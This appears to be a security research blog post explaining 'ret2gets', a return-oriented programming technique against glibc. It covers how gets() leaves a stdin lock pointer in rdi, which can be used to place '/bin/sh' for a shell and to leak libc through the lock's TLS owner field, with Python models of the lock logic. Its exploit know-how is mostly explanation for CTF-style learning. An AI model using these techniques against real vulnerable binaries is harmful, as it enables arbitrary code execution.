ret2gets
Who needs "pop rdi" when you have gets()
Ah, the gets function: a staple of insecure coding and overflow challenges, reading as much data as possible up to a \n. While most people are interested in its unlimited overflow, I'm interested in its applications for rdi control, and even libc leaks. What am I talking about, you may be asking?
Well, let's go back to the demo program.
Running this under gdb, let's enter any string and see what happens to the registers after gets. As you probably know, many functions clobber the argument registers, as they have no need to preserve them, and use them either as scratch registers or in other function calls (or both!). For gets, all we'd need is some writable address to land in rdi, then perhaps we could do something?
Bingo! We have an address which appears to exist in libc's writable region, so by calling gets again in our ROP chain, we could overwrite libc data, perhaps smash some useful structures. However, without a libc leak that could be limited. There could be multiple ways to utilise this, but the one I'm most interested in here is smashing _IO_stdfile_0_lock.
_IO_stdfile_0_lock
Let's not beat around the bush: glibc's IO is complicated, so much so that there's a whole category of IO exploitation, called FSOP. That won't be the focus here; instead we're looking at what's generally overlooked when it comes to glibc IO: locking.
Because glibc supports multithreading, many glibc functions need to be thread-safe, which means that they're resistant to data races. This is a problem faced by glibc IO, because multiple threads can share the same FILE structure: if 2 threads try to use one at the same time, that is a race condition, and it can break the FILE. We fix this using locks.
If you've ever looked at glibc source code for IO functions (as you do), you may have noticed a common pattern in a lot of them (except printf and scanf, as they're more complicated, more on those later). Let's take gets (2.35 for now):
At the start of the function it uses _IO_acquire_lock, and at the end it uses _IO_release_lock. The idea is that acquiring the lock tells other threads that stdin is currently in use, and any other threads that try to access stdin will be forced to wait until this thread releases the lock, telling other threads that stdin is no longer in use.
For this reason, FILE has a field _lock, which is a pointer to an _IO_lock_t (stored at offset +0x88):
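As a rough aid for the rest of the post, here is a Python mirror of the lock's layout. It assumes x86-64 and the usual nptl definition with the three fields lock, cnt and owner that are discussed further down; the class name IOLock and the constant name are my own, not glibc's.

```python
import ctypes

class IOLock(ctypes.Structure):
    """Python mirror of _IO_lock_t on x86-64 (assumed layout, not glibc code)."""
    _fields_ = [
        ("lock", ctypes.c_int32),    # low-level lock word used by lll_lock/lll_unlock
        ("cnt", ctypes.c_int32),     # how many times the owner has taken the lock
        ("owner", ctypes.c_uint64),  # pointer-sized: THREAD_SELF of the holder, or NULL
    ]

FILE_LOCK_OFFSET = 0x88  # offset of FILE._lock, as stated in the text

# The whole lock is 16 bytes, and owner starts 8 bytes in.
print(ctypes.sizeof(IOLock), IOLock.lock.offset, IOLock.cnt.offset, IOLock.owner.offset)
```

The detail that matters later is that owner sits only 8 bytes past the start of the lock, which is also where rdi ends up pointing.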
Sidenote on finding locking functions
I had some trouble finding the necessary macros and functions for acquiring and releasing locks, so I'll make a note here. I use Elixir Bootlin for reading and searching the glibc code base. When searching for _IO_acquire_lock, we get multiple definitions, which isn't very helpful (same thing for _IO_release_lock).
So which one gets used?
- sysdeps/htl: This is the Hurd version, which would be used on GNU Hurd. This isn't nearly as common as GNU Linux, so we can ignore this one.
- sysdeps/generic: Like the name suggests, this is designed to work anywhere which doesn't have a specific definition, like a fallback. This isn't used in our case.
- libio/libioP.h: Seems to be another fallback, in a specific case at least, when _IO_MTSAFE_IO isn't defined. If these were used, no locking is done at all, so this implies this is when we don't care about thread safety. In our case _IO_MTSAFE_IO is set, so we can ignore this.
The correct one is sysdeps/nptl, otherwise known as the Native POSIX Threads Library.
_IO_acquire_lock / _IO_release_lock
These macros are defined as follows:
This may look confusing, but the 2 important functions to take away from this are _IO_flockfile and _IO_acquire_lock_fct. The __attribute__((cleanup)) may look bizarre, but all it does is call _IO_acquire_lock_fct on _fp when the artificial do-while(0) block ends (basically at the end of the IO function). _IO_acquire_lock_fct is defined as:
So really from this, the 2 macros for locking and unlocking are _IO_flockfile and _IO_funlockfile.
_IO_USER_LOCK=0x8000 is a flag which seems to indicate whether or not the built-in locking should be used. It is usually used internally, for example on the helper streams in printf. For our purposes we can ignore it, as this check will always pass for stdin (or any of the standard streams for that matter). Finally we get to the macros that we care about: _IO_lock_lock and _IO_lock_unlock.
_IO_lock_lock / _IO_lock_unlock
_IO_lock_lock and _IO_lock_unlock are defined as:
Note that _name is the lock itself, and in the case of gets, is _IO_stdfile_0_lock.
Let's break this down. The owner field stores the address of the TLS (Thread Local Storage) structure for the thread currently using the lock (if you're wondering what the TLS structure is, it's the structure whose address is stored in the fs register; it also stores the canary, and you've likely seen fs:[0x28] in disassembly). So when locking, if the owner is different to THREAD_SELF (i.e. the lock is owned by a different thread, or by nobody), it uses lll_lock to wait until the lock is free, then claims ownership of it. When unlocking, it removes its ownership, and signals that the lock is no longer in use with lll_unlock.
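To make the bookkeeping concrete, here is a toy Python model of the pre-2.37 behaviour as described above. It is a sketch of the logic only, not glibc's code: the class, the function names and the thread id "T1" are made up, and lll_lock/lll_unlock are reduced to setting a flag.

```python
class IOLock:
    """Toy stand-in for _IO_lock_t: lock word, recursion count, owner."""
    def __init__(self):
        self.lock = 0      # 0 = free, 1 = taken
        self.cnt = 0       # how many times the owner has locked it
        self.owner = None  # stands in for the owner's THREAD_SELF pointer

def io_lock_lock(l, self_id):
    # Only go through the low-level lock when we are not already the owner.
    if l.owner != self_id:
        assert l.lock == 0, "a real thread would block in lll_lock here"
        l.lock = 1
        l.owner = self_id
    l.cnt += 1

def io_lock_unlock(l):
    # Decrement first, and only really release once the count reaches 0.
    l.cnt -= 1
    if l.cnt == 0:
        l.owner = None
        l.lock = 0

lk = IOLock()
io_lock_lock(lk, "T1")  # outer call
io_lock_lock(lk, "T1")  # nested call by the same thread just bumps cnt
state_nested = (lk.lock, lk.cnt, lk.owner)
io_lock_unlock(lk)
io_lock_unlock(lk)
state_final = (lk.lock, lk.cnt, lk.owner)
print(state_nested, state_final)
```

In this model the same thread can take the lock twice without blocking on itself, and the lock is only released by the matching second unlock.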
The use of cnt is a bit bizarre to me. The only way I could see this being useful is if the same thread had to use the lock multiple times, perhaps due to recursive(?) calls. Perhaps it's just a flexibility thing, I'm not sure. But what I can tell you is that this will be useful for us in a moment ;)
_IO_stdfile_0_lock in rdi?
You may be wondering why this happens, and while this is slightly bizarre, I can give an educated guess.
For one thing, _IO_lock_unlock is what's called at the very end of most IO functions, including gets, so its effects on the registers are the most recent before returning, with nothing afterwards clobbering the registers.
Above is the disassembly of _IO_lock_unlock. rbp stores the address of stdin, so +182 is checking _IO_USER_LOCK. But then look at +191. Recall that _lock is stored at an offset of +0x88, so this must be loading stdin._lock, which as we know is _IO_stdfile_0_lock, and we see that it's loading into rdi! Then pretty soon afterwards it returns, without clobbering rdi (__lll_lock_wait_private doesn't clobber it either, it's just a thin wrapper around the futex syscall).
So that's where _IO_stdfile_0_lock comes from, but where did it go? Why does _lock get loaded into rdi?
That's a good question, to which my best guess would be that it's an optimization made by the compiler. In the case where lll_unlock is called, the address of _lock is passed directly to the futex wrapper as the one and only argument (i.e. through the rdi register). Therefore it loads _lock into rdi so that it doesn't need to use an extra assignment to prepare the call to futex, like mov rdi, [register containing _lock], which saves space and time.
glibc prior to 2.30
While we're mainly looking at 2.34+, let's have a brief look at versions prior to that. It appears that prior to 2.30, the disassembly looks a bit different. For example, the following is from 2.29.
Instead of loading it into rdi, it loads it into rdx, then later into rdi just for the futex call? And what's going on around the call to __lll_unlock_wake_private with rsp? This seems like a bizarre choice for the compiler to make, and the reason for that is that this part is written in assembly. I couldn't tell you why, but what I can say is that this causes problems for us, as _lock only gets loaded into rdi under very specific circumstances, which hinders our potential techniques.
Detecting this behaviour
For fun, I decided to write a Python script which uses angr to detect this behaviour automatically for a given libc.
The libc doesn't require debug symbols, and the script should work for 2.23-2.39, as these were the versions I tested (2.39 is the most recent version as of writing this).
Exploit techniques
Now for the fun stuff. I'm gonna show you 2 simple techniques which can help you with your ropping, one for controlling rdi and another for leaking libc.
I'll demonstrate these using the demo program, which is patched to run using glibc 2.35 (that'll be important later).
Controlling rdi
One idea you may have already had is that, since _IO_stdfile_0_lock always ends up in rdi after a call to gets, and gets allows us to write arbitrary data to a pointer in rdi, then surely we can just write /bin/sh to _IO_stdfile_0_lock, right?
If you were thinking that, then good job, because you're correct, we can!
Since rdi -> _IO_stdfile_0_lock, another call to gets will write data there. We then send /bin/sh, and that 2nd call to gets will return with _IO_stdfile_0_lock -> "/bin/sh" in rdi. This gets around needing pop rdi ; ret to get a pointer to /bin/sh, so if you had system available, then you could get a shell!
One important thing to note is that after we overwrite the lock, _IO_lock_unlock will be executed before we return. This will decrement cnt, and if the new cnt is 0, then lll_unlock will clobber our data! This is why it's important to overwrite cnt with a value other than 1, and why the value we write has to be 1 greater than the one we want to end up with. The code for this would be as follows:
While this will of course SEGFAULT, we see our desired result of rdi -> "/bin/sh"!
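The +1 adjustment can be checked offline with a small model. This is a sketch under assumptions: the lock is treated as 16 bytes (4-byte lock, 4-byte cnt, 8-byte owner), unlocking follows the pre-2.37 behaviour described above, and the function names and FAKE_TLS value are invented for the illustration.

```python
import struct

FAKE_TLS = 0x7ffff7d8a740  # hypothetical owner pointer

def line_for_lock_string(s: bytes) -> bytes:
    """Line to send so that the lock holds s + NUL after the unlock decrement."""
    assert 4 < len(s) <= 7 and b"\x00" not in s
    want = s.ljust(8, b"\x00")
    cnt = struct.unpack("<I", want[4:])[0]
    bumped = struct.pack("<I", cnt + 1)   # unlocking will subtract 1 again
    assert bumped[3] == 0                 # the 8th byte comes from gets' own terminator
    line = want[:4] + bumped[:3]
    assert b"\n" not in line              # gets would stop at a newline
    return line

def gets_write_then_unlock(mem: bytearray, line: bytes) -> None:
    data = line + b"\x00"                 # gets appends a null byte
    mem[:len(data)] = data
    cnt = (struct.unpack_from("<I", mem, 4)[0] - 1) & 0xFFFFFFFF
    struct.pack_into("<I", mem, 4, cnt)   # --cnt
    if cnt == 0:                          # real release: our bytes get clobbered
        struct.pack_into("<Q", mem, 8, 0)
        struct.pack_into("<I", mem, 0, 0)

def fresh_lock() -> bytearray:
    # State right after _IO_lock_lock: lock = 1, cnt = 1, owner = THREAD_SELF
    return bytearray(struct.pack("<IIQ", 1, 1, FAKE_TLS))

naive = fresh_lock()
gets_write_then_unlock(naive, b"/bin/sh")
adjusted = fresh_lock()
line = line_for_lock_string(b"/bin/sh")
gets_write_then_unlock(adjusted, line)
print(line, bytes(naive[:8]), bytes(adjusted[:8]))
```

Sending /bin/sh unmodified leaves /bin.sh behind, because the decrement hits the first byte of cnt. Sending /bin0sh (the / bumped by one) leaves /bin/sh.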
Another thing to note is that /bin/sh will remain in _IO_stdfile_0_lock until we change it back, so after any subsequent calls to gets, we'll get back this pointer to /bin/sh. Even though locking increments cnt, it leaves the rest of the contents alone, and unlocking then decrements it back.
This relies on being able to skip over lll_unlock by having a large value for cnt.
But for 2.29 and prior, it only loads _lock into rdi when calling lll_unlock, so this won't work as rdi won't end up pointing to _IO_stdfile_0_lock -> "/bin/sh".
I also found out that I'm not the first person to discover this: w3th4nds beat me to it with the challenge Sound of Silence, and I wouldn't be surprised if it's been found/used before then. I just hadn't seen it before writing this.
Leaking libc
There are a few ways you can leak libc using gets. For one, if you have access to printf, then you can just use the trick above to enter a format string and then call printf.
But what if you don't have printf, and instead have only puts? Well fear not, because we have another trick up our sleeves: _lock.owner.
Recall the _IO_lock_t structure:
And also recall that owner gets assigned the address of the TLS structure for this thread. While it isn't immediately at the start of the lock, it's not far out of our reach, so what if we were able to pad up to it, then call puts? Since TLS (at least for the main thread) is allocated relative to libc, all you'd need is the offset from TLS to libc base.
Unfortunately this leak can cause problems depending on the kernel(?), because the TLS can be in different places on different machines, and it doesn't seem to be fixable by using the same docker.
So keep that in mind when transferring the exploit to remote.
While I suspect this is due to a kernel difference, if anyone knows exactly why, I'd love to hear it, and I could include it here as well.
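As a sketch of the arithmetic on the receiving end: once puts has printed the padding followed by owner, the pointer can be rebuilt and shifted by a fixed distance. The distance below is a HYPOTHETICAL value (measure the real one in gdb for your target, and expect it to differ between machines as noted above), and the sample bytes are fabricated purely to exercise the function.

```python
import struct

PAD_LEN = 8                   # lock (4 bytes) + cnt (4 bytes) come before owner
LIBC_BASE_MINUS_TLS = 0x28c0  # HYPOTHETICAL distance from the TLS pointer to libc base

def parse_tls_leak(raw: bytes) -> int:
    """raw is what puts printed, without its trailing newline."""
    ptr = raw[PAD_LEN:PAD_LEN + 8]  # puts stops at the first null, usually after 6 bytes
    return struct.unpack("<Q", ptr.ljust(8, b"\x00"))[0]

# Fabricated sample output: 8 bytes of padding, then 6 pointer bytes.
fake_tls = 0x7ffff7d8a740
raw = b"P" * PAD_LEN + struct.pack("<Q", fake_tls)[:6]

tls = parse_tls_leak(raw)
libc_base = tls + LIBC_BASE_MINUS_TLS
print(hex(tls), hex(libc_base))
```

A quick sanity check on any real run is that the computed base should be page-aligned. If it isn't, the distance is wrong for that machine.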
There are initially a few problems with this:
- All input using gets is terminated by a null byte
- owner gets NULL'ed when unlocking if --cnt==0 (i.e. cnt==1)
But both of these can be solved with one input:
The main idea behind this is that we want to set cnt=0, so that when it comes to unlocking, it will decrement cnt first, then check it against 0, which fails because now cnt=0xffffffff, due to an integer underflow. What this does is eliminate the terminating null byte from gets, but also since the check fails, owner doesn't get NULL'ed, meaning we have uninterrupted padding up to owner=TLS, meaning we can then call puts and leak TLS.
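Here is that sequence played out on a 16-byte model of the lock. It is a simulation under assumptions, not an exploit: lock and unlock follow the pre-2.37 behaviour described earlier, FAKE_TLS is a made-up pointer, and the input line (4 filler bytes plus 3 explicit nulls, with gets supplying the 4th) is one way to get cnt=0.

```python
import struct

FAKE_TLS = 0x7ffff7d8a740  # hypothetical THREAD_SELF value

def lock_pre237(mem: bytearray, self_ptr: int) -> None:
    if struct.unpack_from("<Q", mem, 8)[0] != self_ptr:
        struct.pack_into("<I", mem, 0, 1)         # lll_lock on a free lock
        struct.pack_into("<Q", mem, 8, self_ptr)  # owner = THREAD_SELF
    cnt = struct.unpack_from("<I", mem, 4)[0]
    struct.pack_into("<I", mem, 4, (cnt + 1) & 0xFFFFFFFF)

def unlock_pre237(mem: bytearray) -> None:
    cnt = (struct.unpack_from("<I", mem, 4)[0] - 1) & 0xFFFFFFFF
    struct.pack_into("<I", mem, 4, cnt)           # --cnt, wrapping like a C int
    if cnt == 0:
        struct.pack_into("<Q", mem, 8, 0)         # owner = NULL
        struct.pack_into("<I", mem, 0, 0)         # lll_unlock

def gets_into(mem: bytearray, line: bytes, self_ptr: int) -> None:
    lock_pre237(mem, self_ptr)
    data = line + b"\x00"                         # gets appends a null byte
    mem[:len(data)] = data
    unlock_pre237(mem)

def puts_from(mem: bytearray) -> bytes:
    return bytes(mem).split(b"\x00", 1)[0]        # puts stops at the first null

lock_mem = bytearray(16)
gets_into(lock_mem, b"AAAA" + b"\x00" * 3, FAKE_TLS)
leak = puts_from(lock_mem)
leaked_tls = struct.unpack("<Q", leak[8:].ljust(8, b"\x00"))[0]
print(leak, hex(leaked_tls))
```

After the call, cnt reads 0xffffffff, so the 8 bytes in front of owner contain no nulls and puts runs straight into the pointer.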
Adjusting for 2.37+
The above was tested on 2.35, and should work for 2.30-2.36, but 2.37 changed _IO_lock_lock and _IO_lock_unlock to:
Bit more complicated now, but the main takeaways are:
- The inclusion of SINGLE_THREAD_P
- cnt is only decremented if cnt != 0
It seems that cnt = 0 no longer necessarily implies that the lock isn't being used, but rather that it isn't being used by 2+ instances.
This forces us to adjust our techniques slightly, especially for leaking libc (the controlling of rdi, in its current state anyway, hasn't been affected). This is because we can no longer cause an integer underflow to eliminate the terminating null byte, as it refuses to decrement cnt=0.
Fortunately there is a way around this, but it will require an extra call to gets.
So what's going on here?
The main aim of the first gets is to do the following:
- Set lock = 0, which marks the lock as unlocked.
- Fill cnt with junk.
- Clobber owner so that owner != THREAD_SELF
Then on the last call to gets, when _IO_lock_lock is executed:
- The SINGLE_THREAD_P check will fail, even if the process is single-threaded, because we set owner to junk, so owner != NULL. You could do a version where this case passes if you wanted; I decided to make the technique not reliant on it being single-threaded (i.e. more versatile).
- The owner != THREAD_SELF check will succeed.
- Unfortunately the lll_lock that follows is unavoidable, but since we set lock = 0, this lock is marked as unlocked, so this will just lock it (set lock = 1).
- Bingo! The owner gets set to the TLS structure, which is what we want to leak.
Since lock = 1, it contains null bytes which would terminate puts, so here we need to fill lock with junk ("CCCC"). But what about the null byte from gets? Just like before, the cnt getting decremented in unlocking will help to eliminate this null byte.
p.sendline(b"CCCC") will write a null byte into the LSB of cnt. In _IO_lock_unlock, cnt gets decremented as cnt != 0, which converts the \x00 into \xff, and just like before, the unlocking will leave owner alone.
And just like that, we now have padding up to owner=TLS.
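The two-call version can be traced the same way. This is a sketch under assumptions: lock and unlock are modelled on the 2.37+ behaviour as summarised above (not copied from glibc), the process is treated as single-threaded, FAKE_TLS is invented, and the model has 24 bytes so that the first line's terminator has somewhere to land.

```python
import struct

FAKE_TLS = 0x7ffff7d8a740  # hypothetical THREAD_SELF value
SINGLE_THREADED = True     # stands in for SINGLE_THREAD_P

def lock_237(mem: bytearray, self_ptr: int) -> None:
    owner = struct.unpack_from("<Q", mem, 8)[0]
    if SINGLE_THREADED and owner == 0:
        struct.pack_into("<I", mem, 0, 1)
        struct.pack_into("<Q", mem, 8, self_ptr)
    elif owner != self_ptr:
        # lll_lock: only returns immediately if the lock word is 0
        assert struct.unpack_from("<I", mem, 0)[0] == 0, "would block here"
        struct.pack_into("<I", mem, 0, 1)
        struct.pack_into("<Q", mem, 8, self_ptr)
    else:
        cnt = struct.unpack_from("<I", mem, 4)[0]
        struct.pack_into("<I", mem, 4, (cnt + 1) & 0xFFFFFFFF)

def unlock_237(mem: bytearray) -> None:
    cnt = struct.unpack_from("<I", mem, 4)[0]
    if cnt == 0:
        struct.pack_into("<Q", mem, 8, 0)      # owner = NULL
        if not SINGLE_THREADED:
            struct.pack_into("<I", mem, 0, 0)  # lll_unlock
    else:
        struct.pack_into("<I", mem, 4, cnt - 1)

def gets_into(mem: bytearray, line: bytes, self_ptr: int) -> None:
    lock_237(mem, self_ptr)
    data = line + b"\x00"                      # gets appends a null byte
    mem[:len(data)] = data
    unlock_237(mem)

mem = bytearray(24)
# 1st gets: lock = 0, cnt = junk, owner = junk
gets_into(mem, struct.pack("<I", 0) + b"A" * 4 + b"B" * 8, FAKE_TLS)
# 2nd gets: fill lock with junk; the terminator lands in cnt's lowest byte
gets_into(mem, b"CCCC", FAKE_TLS)
leak = bytes(mem).split(b"\x00", 1)[0]         # what puts would print
leaked_tls = struct.unpack("<Q", leak[8:].ljust(8, b"\x00"))[0]
print(leak, hex(leaked_tls))
```

In this trace the first call leaves cnt as AAAA minus one, and the second turns its lowest byte from \x00 into \xff, so the 8 bytes before owner are again free of nulls.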
This version of the leak will actually work before 2.37 as well, so this is the more versatile one.
What if rdi != _IO_stdfile_0_lock?
This is all pretty cool (in my opinion at least; if you disagree, you're wrong), but what if we were presented with the following program:
Now we have a problem. While gets would place _IO_stdfile_0_lock into rdi, the subsequent puts call would clobber it. Now what?
Ideally we'd want to find a way to put _IO_stdfile_0_lock into rdi, and fortunately there are a few tricks we can use in certain cases:
Case 1: rdi is writable
Even if it isn't _IO_stdfile_0_lock, any writable rdi would be a valid candidate for a gets call, which would then put _IO_stdfile_0_lock back into rdi!
A common case for this is after some other IO function. Recall that most IO functions follow that locking pattern, which includes puts. So in the above example, rdi would be _IO_stdfile_1_lock, which we can just call gets on to get our beloved _IO_stdfile_0_lock. For dealing with another IO lock, you can use p.sendline(b"\x01"), as the expected value for lock will be 1 (LLL_LOCK_INITIALIZER_LOCKED).
Case 2: rdi is readable
While this won't make for a valid candidate for gets, it would make a valid candidate for puts, so a call to puts would put us into Case 1, and you can then apply the above.
Case 3: rdi == NULL
This won't be usable in most IO functions unfortunately. But printf isn't just another IO function, it's built different. Let's take a look shall we? Don't worry, we won't go too far ;)
Note that scanf follows a very similar pattern, and displays the same behaviour as printf in this regard.
printf is defined as follows:
Here we see it calls __vfprintf_internal with the first argument (i.e. rdi) being stdout.
Then in __vfprintf_internal we see that early on it calls ARGCHECK
The main takeaway from all of this is that ARGCHECK forces printf to return early if format == NULL, meaning it won't SEGFAULT. And since __vfprintf_internal was called with stdout as the first argument, we can guess that it should be preserved until returning. So, is it?
Yes it is! So now we can just use this as a writable address.
There's also a possibility here to use an FSOP technique to get a leak. I won't go into detail here, but if you're interested here are some links:
Case 4: rdi is junk
This is the most annoying case, as we can't even use rdi as an address. But 2 IO functions that can help here, if you have access to them at least, are putchar and getchar. These are useful because their arguments don't matter (or at least they don't need an address as the first argument), and both will return with an IO lock in rdi.
There's also a non-IO function that can be used here: rand, which returns a pointer to unsafe_state in rdi across a broad range of libc versions. More details on this can be found here.
These functions can of course be applied in any of the above cases as well.
These are just a few functions which can help, there could be many more that I'm not aware of. Most of these are just some common ones which have one thing in common: they're IO functions.
If anyone has any other tricks for this, I'd be interested to know, and maybe I'll update this to include them, with credit of course :)